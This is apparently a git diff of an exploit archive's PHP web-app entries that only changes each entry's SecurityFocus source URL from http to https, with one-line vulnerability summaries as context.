diff --git a/exploits/php/webapps/26637.txt b/exploits/php/webapps/26637.txt index 370b608d1..0f9496a7e 100644 --- a/exploits/php/webapps/26637.txt +++ b/exploits/php/webapps/26637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15604/info +source: https://www.securityfocus.com/bid/15604/info Helpdesk Issue Manager is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26638.txt b/exploits/php/webapps/26638.txt index 55228dc31..9e790d189 100644 --- a/exploits/php/webapps/26638.txt +++ b/exploits/php/webapps/26638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15604/info +source: https://www.securityfocus.com/bid/15604/info Helpdesk Issue Manager is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26639.txt b/exploits/php/webapps/26639.txt index d639cde60..ef003451a 100644 --- a/exploits/php/webapps/26639.txt +++ b/exploits/php/webapps/26639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. diff --git a/exploits/php/webapps/26640.txt b/exploits/php/webapps/26640.txt index 6e0f32e05..c2fec6231 100644 --- a/exploits/php/webapps/26640.txt +++ b/exploits/php/webapps/26640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. diff --git a/exploits/php/webapps/26641.txt b/exploits/php/webapps/26641.txt index f5b04ac54..b7a04ace5 100644 --- a/exploits/php/webapps/26641.txt +++ b/exploits/php/webapps/26641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. 
diff --git a/exploits/php/webapps/26642.txt b/exploits/php/webapps/26642.txt index f733d5399..d8a05590f 100644 --- a/exploits/php/webapps/26642.txt +++ b/exploits/php/webapps/26642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15610/info +source: https://www.securityfocus.com/bid/15610/info GuppY is affected by multiple local file include and information disclosure vulnerabilities. diff --git a/exploits/php/webapps/26643.txt b/exploits/php/webapps/26643.txt index 8b2eb9c7b..6b74ec435 100644 --- a/exploits/php/webapps/26643.txt +++ b/exploits/php/webapps/26643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15611/info +source: https://www.securityfocus.com/bid/15611/info PHP Doc System is prone to a local file-include vulnerability. This is due to the application's failure to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26644.txt b/exploits/php/webapps/26644.txt index 7fe982098..e3db262b2 100644 --- a/exploits/php/webapps/26644.txt +++ b/exploits/php/webapps/26644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15612/info +source: https://www.securityfocus.com/bid/15612/info SearchSolutions SearchFeed, RevenuePilot, and Google API are prone to cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26645.txt b/exploits/php/webapps/26645.txt index 8ae5cdce8..d93eaca88 100644 --- a/exploits/php/webapps/26645.txt +++ b/exploits/php/webapps/26645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15617/info +source: https://www.securityfocus.com/bid/15617/info ASP-Rider is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26646.txt b/exploits/php/webapps/26646.txt index 2579aa02f..36dd70d58 100644 --- a/exploits/php/webapps/26646.txt 
+++ b/exploits/php/webapps/26646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15621/info +source: https://www.securityfocus.com/bid/15621/info PHP Upload Center is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26647.txt b/exploits/php/webapps/26647.txt index b70aa623e..9117ac8c7 100644 --- a/exploits/php/webapps/26647.txt +++ b/exploits/php/webapps/26647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15622/info +source: https://www.securityfocus.com/bid/15622/info Fantastic News is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26649.txt b/exploits/php/webapps/26649.txt index 13fab13f5..2a071cf3f 100644 --- a/exploits/php/webapps/26649.txt +++ b/exploits/php/webapps/26649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15628/info +source: https://www.securityfocus.com/bid/15628/info DMANews is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26650.txt b/exploits/php/webapps/26650.txt index b8d7d2b63..1996b253d 100644 --- a/exploits/php/webapps/26650.txt +++ b/exploits/php/webapps/26650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15631/info +source: https://www.securityfocus.com/bid/15631/info Entergal MX is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26651.txt b/exploits/php/webapps/26651.txt index d12e46a37..2737759f3 100644 --- a/exploits/php/webapps/26651.txt +++ b/exploits/php/webapps/26651.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15632/info +source: https://www.securityfocus.com/bid/15632/info BosDates is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26652.txt b/exploits/php/webapps/26652.txt index d88568e8e..794ffa0cc 100644 --- a/exploits/php/webapps/26652.txt +++ b/exploits/php/webapps/26652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15633/info +source: https://www.securityfocus.com/bid/15633/info Post Affiliate Pro is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26653.txt b/exploits/php/webapps/26653.txt index f57738f58..2dc99e282 100644 --- a/exploits/php/webapps/26653.txt +++ b/exploits/php/webapps/26653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15634/info +source: https://www.securityfocus.com/bid/15634/info GhostScripter Amazon Shop is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26654.txt b/exploits/php/webapps/26654.txt index 1b6873ec9..8d31fcc98 100644 --- a/exploits/php/webapps/26654.txt +++ b/exploits/php/webapps/26654.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15635/info +source: https://www.securityfocus.com/bid/15635/info KBase Express is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26655.txt b/exploits/php/webapps/26655.txt index c41ef559a..d88604980 100644 --- a/exploits/php/webapps/26655.txt +++ b/exploits/php/webapps/26655.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15636/info +source: https://www.securityfocus.com/bid/15636/info ltwCalendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26656.txt b/exploits/php/webapps/26656.txt index f67ab9778..4fcbfed16 100644 --- a/exploits/php/webapps/26656.txt +++ b/exploits/php/webapps/26656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15637/info +source: https://www.securityfocus.com/bid/15637/info Orca Knowledgebase is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26657.txt b/exploits/php/webapps/26657.txt index 1bb5f4d82..9eacafcf5 100644 --- a/exploits/php/webapps/26657.txt +++ b/exploits/php/webapps/26657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15638/info +source: https://www.securityfocus.com/bid/15638/info Orca Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26658.txt b/exploits/php/webapps/26658.txt index 2d76e7432..1eda20112 100644 --- a/exploits/php/webapps/26658.txt +++ b/exploits/php/webapps/26658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15639/info +source: https://www.securityfocus.com/bid/15639/info Orca Ringmaker is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26659.txt b/exploits/php/webapps/26659.txt index a1c89e262..c023bd71f 100644 --- a/exploits/php/webapps/26659.txt +++ b/exploits/php/webapps/26659.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15640/info +source: https://www.securityfocus.com/bid/15640/info FAQ System is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26660.txt b/exploits/php/webapps/26660.txt index 9caa5c791..1a51c7fbd 100644 --- a/exploits/php/webapps/26660.txt +++ b/exploits/php/webapps/26660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15640/info +source: https://www.securityfocus.com/bid/15640/info FAQ System is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26661.txt b/exploits/php/webapps/26661.txt index 4084c9ab4..75444f05d 100644 --- a/exploits/php/webapps/26661.txt +++ b/exploits/php/webapps/26661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15641/info +source: https://www.securityfocus.com/bid/15641/info Survey System is prone to multiple SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26662.php b/exploits/php/webapps/26662.php index f9b815de6..47cdd7c08 100644 --- a/exploits/php/webapps/26662.php +++ b/exploits/php/webapps/26662.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15643/info +source: https://www.securityfocus.com/bid/15643/info N-13 News is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26663.txt b/exploits/php/webapps/26663.txt index 2bc8c3320..f724d7e46 100644 --- a/exploits/php/webapps/26663.txt +++ b/exploits/php/webapps/26663.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15644/info +source: https://www.securityfocus.com/bid/15644/info DRZES HMS is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before it is used in SQL queries. diff --git a/exploits/php/webapps/26667.txt b/exploits/php/webapps/26667.txt index ace3885b3..daf0ed18f 100644 --- a/exploits/php/webapps/26667.txt +++ b/exploits/php/webapps/26667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15650/info +source: https://www.securityfocus.com/bid/15650/info SocketKB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26668.txt b/exploits/php/webapps/26668.txt index af4e34ec3..28453f734 100644 --- a/exploits/php/webapps/26668.txt +++ b/exploits/php/webapps/26668.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15651/info +source: https://www.securityfocus.com/bid/15651/info phpAlbum is prone to a local file-include vulnerability. diff --git a/exploits/php/webapps/26669.txt b/exploits/php/webapps/26669.txt index 0d6c499b8..1a0b126b9 100644 --- a/exploits/php/webapps/26669.txt +++ b/exploits/php/webapps/26669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26670.txt b/exploits/php/webapps/26670.txt index abdc418f9..e5d86db25 100644 --- a/exploits/php/webapps/26670.txt +++ b/exploits/php/webapps/26670.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26671.txt b/exploits/php/webapps/26671.txt index 372f0dced..a8dfd27ad 100644 --- a/exploits/php/webapps/26671.txt +++ b/exploits/php/webapps/26671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26672.txt b/exploits/php/webapps/26672.txt index 615df9a9d..a8fe1ee4a 100644 --- a/exploits/php/webapps/26672.txt +++ b/exploits/php/webapps/26672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15652/info +source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26673.txt b/exploits/php/webapps/26673.txt index 59c24d24b..6785b14cc 100644 --- a/exploits/php/webapps/26673.txt +++ b/exploits/php/webapps/26673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26674.txt b/exploits/php/webapps/26674.txt index 18936fac9..444140d6e 100644 --- a/exploits/php/webapps/26674.txt 
+++ b/exploits/php/webapps/26674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26675.txt b/exploits/php/webapps/26675.txt index 02a6cd935..a9892baa3 100644 --- a/exploits/php/webapps/26675.txt +++ b/exploits/php/webapps/26675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26676.txt b/exploits/php/webapps/26676.txt index c9e0c1ae6..1f1b8bd64 100644 --- a/exploits/php/webapps/26676.txt +++ b/exploits/php/webapps/26676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26677.txt b/exploits/php/webapps/26677.txt index a727ba926..a6d63ea9f 100644 --- a/exploits/php/webapps/26677.txt +++ b/exploits/php/webapps/26677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15653/info +source: https://www.securityfocus.com/bid/15653/info Softbiz FAQ is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26678.txt b/exploits/php/webapps/26678.txt index 0f321a623..2e548f9ef 100644 --- a/exploits/php/webapps/26678.txt +++ b/exploits/php/webapps/26678.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15655/info +source: https://www.securityfocus.com/bid/15655/info FAQRing is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26679.txt b/exploits/php/webapps/26679.txt index 62f486114..e89636c42 100644 --- a/exploits/php/webapps/26679.txt +++ b/exploits/php/webapps/26679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15656/info +source: https://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26680.txt b/exploits/php/webapps/26680.txt index c138e7f7c..705f4755b 100644 --- a/exploits/php/webapps/26680.txt +++ b/exploits/php/webapps/26680.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15656/info +source: https://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26681.txt b/exploits/php/webapps/26681.txt index 77f841352..85e2a3111 100644 --- a/exploits/php/webapps/26681.txt +++ b/exploits/php/webapps/26681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15656/info +source: https://www.securityfocus.com/bid/15656/info WSN Knowledge Base is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26683.txt b/exploits/php/webapps/26683.txt index 9a0527819..cf1f4bb7c 100644 --- a/exploits/php/webapps/26683.txt 
+++ b/exploits/php/webapps/26683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15657/info +source: https://www.securityfocus.com/bid/15657/info O-Kiraku Nikki is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26684.txt b/exploits/php/webapps/26684.txt index 17446ba0b..5d13f01f4 100644 --- a/exploits/php/webapps/26684.txt +++ b/exploits/php/webapps/26684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15658/info +source: https://www.securityfocus.com/bid/15658/info 88Scripts Event Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26685.txt b/exploits/php/webapps/26685.txt index 9e3316d4b..62bd3b8e5 100644 --- a/exploits/php/webapps/26685.txt +++ b/exploits/php/webapps/26685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15659/info +source: https://www.securityfocus.com/bid/15659/info Instant Photo Gallery is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26686.txt b/exploits/php/webapps/26686.txt index e2bd47369..3b2091947 100644 --- a/exploits/php/webapps/26686.txt +++ b/exploits/php/webapps/26686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15659/info +source: https://www.securityfocus.com/bid/15659/info Instant Photo Gallery is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26687.txt b/exploits/php/webapps/26687.txt index ce8e00d2b..cd073fb58 100644 
--- a/exploits/php/webapps/26687.txt +++ b/exploits/php/webapps/26687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15662/info +source: https://www.securityfocus.com/bid/15662/info WebCalendar is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26688.php b/exploits/php/webapps/26688.php index a81fe3a55..7300c79b8 100644 --- a/exploits/php/webapps/26688.php +++ b/exploits/php/webapps/26688.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15665/info +source: https://www.securityfocus.com/bid/15665/info Lore is prone to an SQL injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26689.txt b/exploits/php/webapps/26689.txt index ecf13cba5..79f42cb47 100644 --- a/exploits/php/webapps/26689.txt +++ b/exploits/php/webapps/26689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15667/info +source: https://www.securityfocus.com/bid/15667/info DotClear is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26691.txt b/exploits/php/webapps/26691.txt index 9975a0557..64897ff92 100644 --- a/exploits/php/webapps/26691.txt +++ b/exploits/php/webapps/26691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15673/info +source: https://www.securityfocus.com/bid/15673/info WebCalendar is prone to an HTTP response-splitting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26692.txt b/exploits/php/webapps/26692.txt index d5ba12f5f..3e06dbb21 100644 --- a/exploits/php/webapps/26692.txt +++ b/exploits/php/webapps/26692.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15675/info +source: https://www.securityfocus.com/bid/15675/info Extreme Search Corporate Edition is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26693.txt b/exploits/php/webapps/26693.txt index fe05fd9cf..78a18a57c 100644 --- a/exploits/php/webapps/26693.txt +++ b/exploits/php/webapps/26693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15676/info +source: https://www.securityfocus.com/bid/15676/info Trac is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26694.txt b/exploits/php/webapps/26694.txt index 7b2daf5df..d756126b9 100644 --- a/exploits/php/webapps/26694.txt +++ b/exploits/php/webapps/26694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15679/info +source: https://www.securityfocus.com/bid/15679/info phpMyChat is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26695.txt b/exploits/php/webapps/26695.txt index a9886ed1d..cedb4b9c0 100644 --- a/exploits/php/webapps/26695.txt +++ b/exploits/php/webapps/26695.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15679/info +source: https://www.securityfocus.com/bid/15679/info phpMyChat is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26696.txt b/exploits/php/webapps/26696.txt index 13cbb4d83..6be551111 100644 --- a/exploits/php/webapps/26696.txt +++ b/exploits/php/webapps/26696.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15679/info +source: https://www.securityfocus.com/bid/15679/info phpMyChat is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26697.php b/exploits/php/webapps/26697.php index 5dcd0098f..bd5156fb8 100644 --- a/exploits/php/webapps/26697.php +++ b/exploits/php/webapps/26697.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15680/info +source: https://www.securityfocus.com/bid/15680/info PHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26698.txt b/exploits/php/webapps/26698.txt index 02836de69..5be792cb5 100644 --- a/exploits/php/webapps/26698.txt +++ b/exploits/php/webapps/26698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15683/info +source: https://www.securityfocus.com/bid/15683/info NetClassifieds is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26699.txt b/exploits/php/webapps/26699.txt index 941011100..566ce2da5 100644 --- a/exploits/php/webapps/26699.txt +++ b/exploits/php/webapps/26699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15683/info +source: https://www.securityfocus.com/bid/15683/info NetClassifieds is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26706.txt b/exploits/php/webapps/26706.txt index cd0e4afd0..c7f18ca35 100644 --- a/exploits/php/webapps/26706.txt +++ b/exploits/php/webapps/26706.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15698/info +source: https://www.securityfocus.com/bid/15698/info PHP-Fusion is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26707.txt b/exploits/php/webapps/26707.txt index 100373cf5..38e066ff9 100644 --- a/exploits/php/webapps/26707.txt +++ b/exploits/php/webapps/26707.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15699/info +source: https://www.securityfocus.com/bid/15699/info Alisveristr E-commerce is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26713.txt b/exploits/php/webapps/26713.txt index b4b005908..eff4c5182 100644 --- a/exploits/php/webapps/26713.txt +++ b/exploits/php/webapps/26713.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15700/info +source: https://www.securityfocus.com/bid/15700/info phpYellowTM is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26714.txt b/exploits/php/webapps/26714.txt index 3a76a7979..bf6d952bd 100644 --- a/exploits/php/webapps/26714.txt +++ b/exploits/php/webapps/26714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15700/info +source: https://www.securityfocus.com/bid/15700/info phpYellowTM is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26715.txt b/exploits/php/webapps/26715.txt index 29b18f2a8..5b6089433 100644 --- a/exploits/php/webapps/26715.txt +++ b/exploits/php/webapps/26715.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15701/info +source: https://www.securityfocus.com/bid/15701/info Widget Press Widget Property is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26717.txt b/exploits/php/webapps/26717.txt index 79f3923a0..08b99b066 100644 --- a/exploits/php/webapps/26717.txt +++ b/exploits/php/webapps/26717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15707/info +source: https://www.securityfocus.com/bid/15707/info eCommerce Enterprise Edition is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26718.txt b/exploits/php/webapps/26718.txt index 3d9b61b74..3ab2b4063 100644 --- a/exploits/php/webapps/26718.txt +++ b/exploits/php/webapps/26718.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15707/info +source: https://www.securityfocus.com/bid/15707/info eCommerce Enterprise Edition is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26719.txt b/exploits/php/webapps/26719.txt index b3188b1b2..bfcc67d81 100644 --- a/exploits/php/webapps/26719.txt +++ b/exploits/php/webapps/26719.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15707/info +source: https://www.securityfocus.com/bid/15707/info eCommerce Enterprise Edition is prone to multiple SQL injection vulnerabilities. diff --git a/exploits/php/webapps/26720.txt b/exploits/php/webapps/26720.txt index 3dedde2eb..bbdbd3f0a 100644 --- a/exploits/php/webapps/26720.txt +++ b/exploits/php/webapps/26720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15709/info +source: https://www.securityfocus.com/bid/15709/info Landshop is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26722.txt b/exploits/php/webapps/26722.txt index 7d4a75b80..67fa4d3c0 100644 
--- a/exploits/php/webapps/26722.txt +++ b/exploits/php/webapps/26722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15713/info +source: https://www.securityfocus.com/bid/15713/info Hobosworld HobSR is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26723.txt b/exploits/php/webapps/26723.txt index 0e9aa5854..c887ac38f 100644 --- a/exploits/php/webapps/26723.txt +++ b/exploits/php/webapps/26723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15714/info +source: https://www.securityfocus.com/bid/15714/info Relative Real Estate Systems is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26724.txt b/exploits/php/webapps/26724.txt index c1801f626..0a015923b 100644 --- a/exploits/php/webapps/26724.txt +++ b/exploits/php/webapps/26724.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26725.txt b/exploits/php/webapps/26725.txt index 239455085..650229d64 100644 --- a/exploits/php/webapps/26725.txt +++ b/exploits/php/webapps/26725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15715/info +source: https://www.securityfocus.com/bid/15715/info eDating Professional is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26726.txt b/exploits/php/webapps/26726.txt index 8f7bf7581..ef27f7534 100644 --- a/exploits/php/webapps/26726.txt +++ b/exploits/php/webapps/26726.txt 
